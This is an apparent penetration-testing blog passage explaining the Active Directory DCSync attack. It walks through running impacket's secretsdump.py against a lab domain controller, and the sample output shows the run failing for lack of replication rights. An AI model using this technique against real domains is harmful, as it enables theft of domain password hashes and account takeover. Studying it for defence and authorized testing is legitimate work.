Within an Active Directory network, it’s useful to have a backup Domain Controller so if your primary fails, you’ll have a second one to back you up. Perhaps if your workplace gets hit on Ransomware, you may have a hot site so that you can be back up in running in a few minutes. These are all valid reasons that a user account might have a very dangerous set of account permissions called “Replicating Directory Changes”, “Replicating Directory Changes All”, and lastly, “Replicating Directory Changes in Filtered Set”. This is commonly referred to as “DC Sync”, or Domain Controller Sync.
Attack
We will primarily be working with the impacket tool called “secretsdump.py” this time around. Access to any ordinary user account will not suffice. as described above, a user account with Replicating Directory Changes is required. This is what occurs when a user account without these privileges attempts to preform the attack.
┌─[root@Sp00kyS3c]─[~/impacket/examples]
└──╼ #./secretsdump.py -dc-ip 10.13.37.10 spookysec.local/svc-demo:manager@10.10.10.123
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
If you’re not careful, this could trigger an Intrusion Prevention/Detection System alert.
With a proper user account this attack will likely succeed with ease.
